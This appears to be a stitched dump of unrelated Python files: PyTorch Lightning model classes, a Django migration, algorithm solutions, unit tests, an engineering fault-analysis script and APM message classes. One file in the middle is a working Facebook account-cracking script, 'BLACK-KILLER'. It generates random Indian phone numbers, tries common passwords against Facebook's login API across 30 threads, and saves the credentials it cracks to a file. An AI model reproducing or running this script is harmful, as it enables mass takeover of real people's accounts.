self.scheduler = self.supported_schedulers[self.cfg.scheduler['name']](
self.optimizer, **self.cfg.scheduler['params'])
def forward(self, x):
out = self.model(x)
return out
def training_step(self, batch, batch_idx):
loss, pred, labels = self._share_step(batch, 'train')
return {'loss': loss, 'pred': pred, 'labels': labels}
def validation_step(self, batch, batch_idx):
loss, pred, labels = self._share_step(batch, 'val')
return {'loss': loss, 'pred': pred, 'labels': labels}
def predict_step(self, batch, batch_idx, dataloader_idx=0):
images, _ = batch
logits, embeddings = self.model(images, True)
pred = logits.squeeze(1).sigmoid().detach().cpu().numpy() * 100.
embeddings = embeddings.detach().cpu().numpy()
return {'pred': pred, 'embeddings': embeddings}
def _share_step(self, batch, mode):
images, labels = batch
labels = labels.float() / 100.0
if torch.rand(1)[0] < 0.5 and mode == 'train':
mix_images, target_a, target_b, lam = mixup(
images, labels, alpha=0.5)
logits = self.forward(mix_images).squeeze(1)
loss = self.criterion(logits, target_a) * lam + \
(1 - lam) * self.criterion(logits, target_b)
else:
logits = self.forward(images).squeeze(1)
loss = self.criterion(logits, labels)
pred = logits.sigmoid().detach().cpu() * 100.
labels = labels.detach().cpu() * 100.
return loss, pred, labels
def training_epoch_end(self, outputs):
self._share_epoch_end(outputs, 'train')
def validation_epoch_end(self, outputs):
self._share_epoch_end(outputs, 'val')
def _share_epoch_end(self, outputs, mode):
preds = []
labels = []
for out in outputs:
pred, label = out['pred'], out['labels']
preds.append(pred)
labels.append(label)
preds = torch.cat(preds)
labels = torch.cat(labels)
metrics = torch.sqrt(((labels - preds) ** 2).mean())
self.log(f'{mode}_loss', metrics)
def check_gradcam(self, dataloader, target_layer, target_category, reshape_transform=None):
inv_normalize = T.Normalize(mean=[-m/s for m, s in zip(self.cfg.image_mean, self.cfg.image_std)],
std=[1/s for s in self.cfg.image_std])
cam = GradCAMPlusPlus(
model=self,
target_layer=target_layer,
use_cuda=self.cfg.trainer['gpus'],
reshape_transform=reshape_transform)
org_images, labels = iter(dataloader).next()
cam.batch_size = len(org_images)
images = org_images.to(self.device)
logits = self.forward(images).squeeze(1)
pred = logits.sigmoid().detach().cpu().numpy() * 100
labels = labels.cpu().numpy()
grayscale_cam = cam(input_tensor=images,
target_category=target_category, eigen_smooth=True)
org_images = inv_normalize(images)
org_images = org_images.detach().cpu().numpy().transpose(0, 2, 3, 1)
return org_images, grayscale_cam, pred, labels
def configure_optimizers(self):
self._build_optimizer()
self._build_scheduler()
return {"optimizer": self.optimizer, "lr_scheduler": self.scheduler}
class ResizerModel(LightningModule):
supported_models = {
'Resizer': learnable_resizer.__dict__['Resizer']
}
supported_loss = {
'CrossEntropyLoss': torch.nn.CrossEntropyLoss,
'MSE': torch.nn.MSELoss
}
supported_optimizers = {
'Adam': torch.optim.Adam,
'AdamW': torch.optim.AdamW
}
supported_schedulers = {
'CosineAnnealingWarmRestarts': torch.optim.lr_scheduler.CosineAnnealingWarmRestarts
}
def __init__(self,
cfg):
super().__init__()
self.cfg = cfg
self._build_model()
self._build_criterion()
def _build_model(self):
if self.cfg.model_name not in self.supported_models:
raise ValueError(
f"{self.cfg.model_name} not supported, check your configuration")
self.model = self.supported_models[self.cfg.model_name](self.cfg)
def _build_criterion(self):
if self.cfg.loss not in self.supported_loss:
raise ValueError(
f"{self.cfg.loss} not supported, check your configuration")
self.criterion = self.supported_loss[self.cfg.loss]()
def _build_optimizer(self):
if self.cfg.optimizer['name'] not in self.supported_optimizers:
raise ValueError(
f"{self.cfg.optimizer} not supported, check your configuration")
self.optimizer = self.supported_optimizers[self.cfg.optimizer['name']](
self.parameters(), **self.cfg.optimizer['params'])
def _build_scheduler(self):
if self.cfg.scheduler['name'] not in self.supported_schedulers:
raise ValueError(
f"{self.cfg.optimizer} not supported, check your configuration")
self.scheduler = self.supported_schedulers[self.cfg.scheduler['name']](
self.optimizer, **self.cfg.scheduler['params'])
def forward(self, x):
out = self.model(x)
return out
def training_step(self, batch, batch_idx):
loss, pred, labels = self._share_step(batch, 'train')
return {'loss': loss, 'pred': pred, 'labels': labels}
def validation_step(self, batch, batch_idx):
loss, pred, labels = self._share_step(batch, 'val')
return {'loss': loss, 'pred': pred, 'labels': labels}
def _share_step(self, batch, mode):
x, y = batch
y_hat = self.model(x)
loss = self.criterion(y_hat, y)
y_hat = y_hat.detach().cpu()
y = y.detach().cpu()
return loss, y_hat, y
def _share_epoch_end(self, outputs, mode):
preds = []
labels = []
for out in outputs:
pred, label = out['pred'], out['labels']
preds.append(pred)
labels.append(label)
preds = torch.cat(preds)
labels = torch.cat(labels)
metrics = ((labels - preds) ** 2).mean()
self.log(f'{mode}_loss', metrics)
def training_epoch_end(self, training_step_outputs):
self._share_epoch_end(training_step_outputs, 'train')
def validation_epoch_end(self, validation_step_outputs):
self._share_epoch_end(validation_step_outputs, 'val')
def configure_optimizers(self):
self._build_optimizer()
self._build_scheduler()
return {"optimizer": self.optimizer, "lr_scheduler": self.scheduler}
| nilq/baby-python | python |
# Generated by Django 3.1.5 on 2021-04-29 10:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('webpage', '0014_auto_20210428_0912'),
]
operations = [
migrations.AddField(
model_name='notification',
name='read',
field=models.BooleanField(default=False),
),
]
| nilq/baby-python | python |
from __future__ import print_function
# Time: O(n)
# Space: O(1)
#
# Given a roman numeral, convert it to an integer.
#
# Input is guaranteed to be within the xrange from 1 to 3999.
#
class Solution:
# @return an integer
def romanToInt(self, s):
numeral_map = {"I": 1, "V": 5, "X": 10, "L": 50, "C":100, "D": 500, "M": 1000}
decimal = 0
for i in xrange(len(s)):
if i > 0 and numeral_map[s[i]] > numeral_map[s[i - 1]]:
decimal += numeral_map[s[i]] - 2 * numeral_map[s[i - 1]]
else:
decimal += numeral_map[s[i]]
return decimal
if __name__ == "__main__":
print(Solution().romanToInt("IIVX"))
print(Solution().romanToInt("MMMCMXCIX"))
| nilq/baby-python | python |
from mat_mult.mcm import memoized_mcm
def test_memo(test_cases):
for test in test_cases:
dims = test['dims']
best_cost = memoized_mcm(dims=dims)[0]
assert best_cost == test['cost']
| nilq/baby-python | python |
###########################################################################
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
import json
from django.core.management.base import BaseCommand, CommandError
from starthinker_ui.recipe.views import autoscale
from starthinker_ui.recipe.models import Recipe, utc_milliseconds, JOB_LOOKBACK_MS
class Command(BaseCommand):
help = 'Autoscale workers.'
def handle(self, *args, **kwargs):
print(json.dumps(json.loads(autoscale(None).content), indent=2))
for recipe in Recipe.objects.filter(active=True, job_utm__lt=utc_milliseconds()).exclude(job_utm=0):
print(recipe.id, recipe.name, recipe.get_days())
print('---')
for recipe in Recipe.objects.filter(active=True, worker_utm__gte=utc_milliseconds() - JOB_LOOKBACK_MS):
print(recipe.id, recipe.name, recipe.worker_uid)
| nilq/baby-python | python |
import torch
from change_detection_pytorch.encoders import get_encoder
if __name__ == '__main__':
sample = torch.randn(1, 3, 256, 256)
model = get_encoder('mit-b0', img_size=256)
res = model(sample)
for x in res:
print(x.size())
| nilq/baby-python | python |
# -*- Mode: Python -*-
#
# This file calls PARC_FAME_Toolkit and determine possible fault modes
# that exists in CyPhy Driveline Model.
import sys, os, traceback, json, shutil
from collections import OrderedDict
import fetch
script_dir = os.path.dirname(os.path.realpath(__file__))
output_dir = os.path.abspath(os.path.join(script_dir,"../"))
cyphy_model_dir = os.path.abspath(os.path.join(script_dir,"../CyPhy"))
# function to put the result into json format
def output(faultCount,output_dir):
# creating ordered dictionary to be outputted in testbench.json format
data = OrderedDict()
data["$id"] = "1"
data["Name"] = "FAME_Possible_Faults"
MetricDict = OrderedDict()
MetricDict["$id"] = "2"
#setting arbitruary number as default requirement value
MetricDict["Requirement"] = "1000"
MetricDict["Name"] = "Possible_Faults"
MetricDict["Unit"] = "count"
MetricDict["Value"] = faultCount
data["Metric"] = [MetricDict]
with open(os.path.join(script_dir,'FAME_Possible_Faults.testbench.json'),'w') as outfile:
json.dump(data,outfile, indent=2,sort_keys=False)
# quick bug fix for space in modelica folder name
# this is stripping the version number from Modelica library (if version is separated by space).
def set_library_dir():
library_dir = os.path.join(script_dir,'../Libraries/')
if os.path.exists(library_dir):
for foldername in os.listdir(library_dir):
try:
if foldername.split(" ")>1:
os.rename(os.path.join(library_dir,foldername),os.path.join(library_dir,foldername.split()[0]))
except WindowsError:
shutil.rmtree(os.path.join(library_dir,foldername.split()[0]))
os.rename(os.path.join(library_dir,foldername),os.path.join(library_dir,foldername.split()[0]))
else:
outfile = open("_FAILED.txt","w")
outfile.write("Missing Modelica Library which should be in ../Libraries\n")
outfile.close()
sys.exit()
return library_dir
def get_fame_toolbox_modelica_libraries():
flag = 1
# check if any critical library is missing
if (os.path.isdir(os.path.join(script_dir,"FAME")) and
os.path.isdir(os.path.join(script_dir,"MSL")) and
os.path.isdir(os.path.join(script_dir,"pre-faulted"))):
flag = 0
if flag == 1:
# going redownload whole set of key libraries
if os.path.exists(os.path.join(script_dir,"FAME")):
shutil.rmtree(os.path.join(script_dir,"FAME"))
if os.path.exists(os.path.join(script_dir,"MSL")):
shutil.rmtree(os.path.join(script_dir,"MSL"))
if os.path.exists(os.path.join(script_dir,"pre-faulted")):
shutil.rmtree(os.path.join(script_dir,"pre-faulted"))
fetch.fetch_and_unpack_zip_file("http://fame-deploy.parc.com/C2M2L_Decl/fault-enabled-libraries/FAME_Toolkit_Modelica_Files.zip", script_dir)
shutil.move(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files","FAME"),
os.path.join(script_dir,"FAME"))
shutil.move(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files","MSL"),
os.path.join(script_dir,"MSL"))
shutil.move(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files","pre-faulted"),
os.path.join(script_dir,"pre-faulted"))
shutil.rmtree(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files"))
def get_testbench_name():
model_raw_data = open(os.path.join(cyphy_model_dir,"model_config.json"))
model_json = json.load(model_raw_data)
return model_json["model_name"]
try:
import PARC_FAME_Toolkit
library_dir = set_library_dir()
# finding testbench name from json file that CyPhy created.
testbench_name = get_testbench_name()
# finding all the necessary model library to run testbench
"""
# This approach failed because Postprocessing folder, which is not Modelica package
# was in CyPhy folder.
model_libraries = [cyphy_model_dir]
for directory in os.listdir(cyphy_model_dir):
if os.path.isdir(os.path.join(cyphy_model_dir,directory)):
model_libraries.append(os.path.abspath(os.path.join(cyphy_model_dir,directory)))
"""
model_libraries = [os.path.abspath(os.path.join(script_dir,"../CyPhy/"))]
for directory in os.listdir(library_dir):
if os.path.isdir(os.path.join(library_dir,directory)):
model_libraries.append(os.path.abspath(os.path.join(library_dir,directory)))
print model_libraries
get_fame_toolbox_modelica_libraries()
results = PARC_FAME_Toolkit.fault_analyze_testbench(
testbench_name, model_libraries)
except:
sys.stderr.write("Can't list faults:\n%s\n" % traceback.format_exc())
# more complicated error handling can be added here, if desired
else:
# now render it as JSON
with open(os.path.join(script_dir,'possibleFault.json'),'w') as outfile:
jsondata = json.dumps(results, indent=4)
outfile.write(jsondata)
faultCnt = 0
for i in range(len(results)):
try:
faultCnt = faultCnt + len(results[i]["modes"])
except:
pass
output(faultCnt,output_dir)
if faultCnt > 0:
keyfilename = "testbench_manifest.json"
keyfile = os.path.join(output_dir,keyfilename)
with open(keyfile,"r") as infile:
jsondata = json.load(infile, object_pairs_hook=OrderedDict)
for i in range(len(jsondata["Metrics"])):
if jsondata["Metrics"][i]["Name"] == "NumPossFaults":
jsondata["Metrics"][i]["Value"] = str(faultCnt)
jsondata["Status"] = "EXECUTED"
if jsondata["Metrics"][i]["Name"] == "NumPossibleFaults":
jsondata["Metrics"][i]["Value"] = str(faultCnt)
jsondata["Status"] = "EXECUTED"
if jsondata["Metrics"][i]["Name"] == "Number_Faults":
jsondata["Metrics"][i]["Value"] = str(faultCnt)
jsondata["Status"] = "EXECUTED"
with open(keyfile,"w") as outfile:
json.dump(jsondata,outfile, indent=4)
| nilq/baby-python | python |
import logging
from openpyxl import load_workbook, Workbook
from openpyxl.utils.exceptions import InvalidFileException
class XLSXWorkbook:
def __init__(self, filename: str):
self.filename = filename
@property
def filename(self):
return self.__filename
@filename.setter
def filename(self, filename: str, discard: bool = False):
if not discard: # save modified content back to the excel if needed
try:
if self.__workbook is not None and self.__dirty:
self.__workbook.save(self.filename)
except AttributeError:
pass
# open the new excel
try:
self.__workbook = load_workbook(filename)
except InvalidFileException as e:
logging.error(f'Failed to open excel file {filename}: {e}')
self.__workbook = None
else:
self.__filename = filename
finally:
self.__dirty = False
@property
def sheet_names(self) -> list:
if self.__workbook is not None:
return self.__workbook.sheetnames
return None
if __name__ == '__main__':
workbook = XLSXWorkbook('../../../../dataset/bentre/So Lieu Man Ben Tre 2018.xlsx')
print(workbook.sheet_names)
| nilq/baby-python | python |
from __future__ import annotations
from unittest import TestCase
from tests.classes.simple_book import SimpleBook
from tests.classes.simple_deadline import SimpleDeadline
class TestUpdate(TestCase):
def test_update_without_arguments_wont_change_anything(self):
book = SimpleBook(name='Thao Bvê', published=False)
book.update()
self.assertEqual(book._data_dict,
{'name': 'Thao Bvê', 'published': False})
def test_update_with_keyed_arguments_updates_value(self):
book = SimpleBook(name='Thao Bvê', published=False)
book.update(name='Thao Boê')
self.assertEqual(book._data_dict,
{'name': 'Thao Boê', 'published': False})
def test_update_set_multiple_values_at_once(self):
book = SimpleBook(name='Thao Boê', published=False)
book.update(name='Thao Bɛ', published=True)
self.assertEqual(book._data_dict,
{'name': 'Thao Bɛ', 'published': True})
def test_update_returns_self_and_is_chained(self):
book = SimpleBook(name='Thao Boê', published=False)
book.update(name='C').update(name='P') \
.update(name='T').update(name='B')
self.assertEqual(book._data_dict, {'published': False, 'name': 'B'})
def test_update_does_not_trigger_transform(self):
deadline = SimpleDeadline()
deadline.update(ended_at='2020-02-04')
self.assertEqual(deadline._data_dict,
{'ended_at': '2020-02-04', 'message': None})
def test_update_sets_back_value_to_none(self):
deadline = SimpleDeadline()
deadline.update(ended_at='2020-02-04').update(ended_at=None)
self.assertEqual(
deadline._data_dict,
{'ended_at': None, 'message': None})
def test_update_does_not_auto_convert_camelcase_keys_into_snakecase(self):
deadline = SimpleDeadline()
with self.assertRaises(ValueError):
deadline.update(**{'endedAt': '2020-02-04'})
def test_update_raises_if_given_key_is_not_allowed(self):
deadline = SimpleDeadline()
with self.assertRaises(ValueError) as context:
deadline.update(**{'name': 'a', 'value': 'b'})
self.assertRegex(str(context.exception),
"'(name|value)', '(value|name)' not allowed in "
"SimpleDeadline\\.")
| nilq/baby-python | python |
#CYBER NAME BLACK-KILLER
#GITHUB: https://github.com/ShuBhamg0sain
#WHATAPP NO +919557777030
import os
CorrectUsername = "g0sain"
CorrectPassword = "sim"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[#] \x1b[0;36m Enter Username\x1b[1;92m➤ ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[#] \x1b[0;36m Enter Password\x1b[1;92m➤ ")
if (password == CorrectPassword):
print "Logged in successfully as " + username #fb-cloning-id SG
loop = 'false'
else:
print "Wrong password!"
os.system('xdg-open https://www.instagram.com/shubham_g0sain/?hl=en')
else:
print "Wrong username!"
os.system('xdg-open https://www.instagram.com/shubham_g0sain/?hl=en')
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(1000000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 nmbr.py')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
print '[!] Exit'
os.sys.exit()
def psb(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def t():
time.sleep(1)
def cb():
os.system('clear')
##### Dev : ShuBhamg0sain#####
##### LOGO #####
logo='''
\033[1;96m•◈•───────────────•◈•\033[1;92mShuBhamg0sain\033[1;96m•◈•───────────────•◈•
\033[1;97m
\033[1;97m :::!~!!!!!:.
\033[1;97m .xUHWH!! !!?M88WHX:.
\033[1;97m .X*#M@$!! !X!M$$$$$$WWx:.
\033[1;97m :!!!!!!?H! :!$!$$$$$$$$$$8X:
\033[1;97m !!~ ~:~!! :~!$!#$$$$$$$$$$8X:
\033[1;97m :!~::!H!< ~.U$X!?R$$$$$$$$MM!
\033[1;91m ~!~!!!! .: BLACK-KILLER$$$$RMM!
\033[1;97m !:~~~ .:!M"T#$$$$WX??#MRRMMM!
\033[1;97m ~?WuxiW*` `"#$$$$8!!!!??!!!
\033[1;97m :X- M$$$$ `"T#$T~!8$WUXU~
\033[1;97m :%` ~#$$$m: ~!~ ?$$$$$$
\033[1;97m :!`.- ~T$$$$8xx. .xWW- ~""##*"
\033[1;97m..... -~~\033[1;91m:<` ! ~?T#$$@@W@*?$$ /`
\033[1;97mW$@@M!!! .!~~ \033[1;91m!! .:XUW$W!~ `"~: :
\033[1;97m#"~~`.:x%`!! \033[1;91m!H: !WM$$$$Ti.: .!WUn+!`
\033[1;97m:::~:!!`:X~ .:\033[1;92m ?H.!u "$$$B$$$!W:U!T$$M~
\033[1;97m.~~ :X@!.-~ \033[1;92m?@WTWo("*$$$W$TH$! `
\033[1;97mWi.~!X$?!-~ : \033[1;92m?$$$B$Wu("**$RM!
\033[1;97m$R@i.~~ ! : \033[1;92m~$$$$$B$$en:``
\033[1;97m?MXT@Wx.~ : \033[1;92m~"##*$$$$M~
\033[1;47m \033[1;31mShuBhamg0sain \033[1;0m
\x1b[1;93m--------------------------------------------------------------
\x1b[1;92m➣ NAME : Shubhamg0sain
\x1b[1;91m➣ CYBER NAME : BLACK-KILLER
\x1b[1;93m➣ WHATSAPP NO : +919557777030
\x1b[1;95m➣ WARNING : DON,T CALL ME ONLY TEXT
\x1b[1;97m➣ NOTE : USE FAST 4G SIM NET
\x1b[1;93m--------------------------------------------------------------"""
'''
back = 0
successful = []
cpb = []
oks = []
id = []
def menu():
os.system('clear')
print logo
print "\033[1;92mCYBER_HACKER_GLAXY_R.H.P_1.286-Wellcome"
print
print "\033[1;91mATTACK ON Indian Ids"
print "\033[1;92m[1] starter 919"
print "\033[1;92m[2] starter 918 "
print "\033[1;92m[3] starter 917"
print "\033[1;92m[4] my whatapp group"
print "\033[1;92m[5] my instagram id"
print "\033[1;92m[6] UPDATE SYSTEM"
print "\033[1;92m[0] FOR EXIT"
print 50*'-'
action()
def action():
bch = raw_input('\n ENTER HERE ANY NUMBER ')
if bch =='':
print '[!] Fill in correctly'
action()
elif bch =="1":
os.system("clear")
print (logo)
print "\033[1;91mENTER THE CODE HERE"
print "\033[1;95m560, 650, 717, 810, 871, 818, 871, 910, 958, 971, 540, 718, 891, 911, 990, 716"
print "\033[1;95m582, 654, 711, 811, 873, 899, 953, 999, 015, 310, 311, 312, 313, 350, 555"
try:
c = raw_input(" SELECTED CODE: ")
k="+919"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="2":
os.system("clear")
print (logo)
print "\033[1;91mENTER THE CODE HERE"
print "\033[1;94m130, 527, 800, 826, 506, 510, 512, 743, 744, 745, 750, 595, 882, 285, 802"
print "\033[1;95m375, 376, 377, 447, 586, 587, 588, 860, 010, 287, 467, 468, 470, 471"
try:
c = raw_input(" SELECTED CODE: ")
k="+918"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="3":
os.system("clear")
print (logo)
print "\033[1;91mENTER THE CODE HERE"
print "\033[1;94m011, 838, 428, 827"
print "\033[1;95m861, 862, 863, 503"
try:
c = raw_input(" SELECTED CODE: ")
k="+917"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="4":
os.system('xdg-open https://chat.whatsapp.com/JtCW38B01hjAGwlVHhyu5q')
print "\033[1;91mrun allsim by python2 S.py"
elif bch =="5":
os.system('xdg-open https://www.instagram.com/shubham_g0sai')
print "\033[1;91mrun allsim by python2 S.py"
elif bch =="6":
os.system("clear")
os.system("pip2 install --upgrade balln")
os.system("pip2 install --upgrade balln")
os.system("clear")
print(logo)
print
psb (" Tool has been successfully updated")
time.sleep(2)
os.system("python2 S.py")
# elif chb =='3':
# os.system('xdg-open https://www.facebook.com/100002059014174/posts/2677733205638620/?substory_index=0&app=fbl')
# time.sleep(1)
# menu()
elif bch =='0':
exb()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
psb ('[✓] Total Numbers: '+xxx)
time.sleep(0.5)
psb ('[✓] Please wait, process is running ...')
time.sleep(0.5)
psb ('[!] (for Exit) Press CTRL Then Press z')
time.sleep(0.5)
print 50*'-'
print
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass1
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass1
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
else:
pass2 = '786786'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass2+'\n')
okb.close()
oks.append(c+user+pass2)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass2+'\n')
cps.close()
cpb.append(c+user+pass2)
else:
pass3 = k + user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass3+'\n')
okb.close()
oks.append(c+user+pass3)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass3+'\n')
cps.close()
cpb.append(c+user+pass3)
else:
pass4 = 'india123'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
else:
pass4 = 'india1234'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50*'-'
print '[✓] Process Has Been Completed ....'
print '[✓] Total OK/CP : '+str(len(oks))+'/'+str(len(cpb))
print('[✓] CP File Has Been Saved : save/checkpoint.txt')
raw_input('\n[Press Enter To Go Back]')
os.system('python2 S.py')
if __name__ == '__main__':
menu()
| nilq/baby-python | python |
# coding=utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import re
from scout_apm.compat import iteritems
logger = logging.getLogger(__name__)
key_regex = re.compile(r"^[a-zA-Z0-9]{20}$")
class Register(object):
__slots__ = ("app", "key", "hostname")
def __init__(self, app, key, hostname):
self.app = app
self.key = key
self.hostname = "force_set_hostname"
def message(self):
key_prefix = self.key[:3]
key_matches_regex = bool(key_regex.match(self.key))
logger.info(
"Registering with app=%s key_prefix=%s key_format_validated=%s host=%s"
% (self.app, key_prefix, key_matches_regex, self.hostname)
)
return {
"Register": {
"app": self.app,
"key": self.key,
"host": self.hostname,
"language": "python",
"api_version": "1.0",
}
}
class StartSpan(object):
__slots__ = ("timestamp", "request_id", "span_id", "parent", "operation")
def __init__(self, timestamp, request_id, span_id, parent, operation):
self.timestamp = timestamp
self.request_id = request_id
self.span_id = span_id
self.parent = parent
self.operation = operation
def message(self):
return {
"StartSpan": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
"span_id": self.span_id,
"parent_id": self.parent,
"operation": self.operation,
}
}
class StopSpan(object):
__slots__ = ("timestamp", "request_id", "span_id")
def __init__(self, timestamp, request_id, span_id):
self.timestamp = timestamp
self.request_id = request_id
self.span_id = span_id
def message(self):
return {
"StopSpan": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
"span_id": self.span_id,
}
}
class StartRequest(object):
__slots__ = ("timestamp", "request_id")
def __init__(self, timestamp, request_id):
self.timestamp = timestamp
self.request_id = request_id
def message(self):
return {
"StartRequest": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
}
}
class FinishRequest(object):
__slots__ = ("timestamp", "request_id")
def __init__(self, timestamp, request_id):
self.timestamp = timestamp
self.request_id = request_id
def message(self):
return {
"FinishRequest": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
}
}
class TagSpan(object):
__slots__ = ("timestamp", "request_id", "span_id", "tag", "value")
def __init__(self, timestamp, request_id, span_id, tag, value):
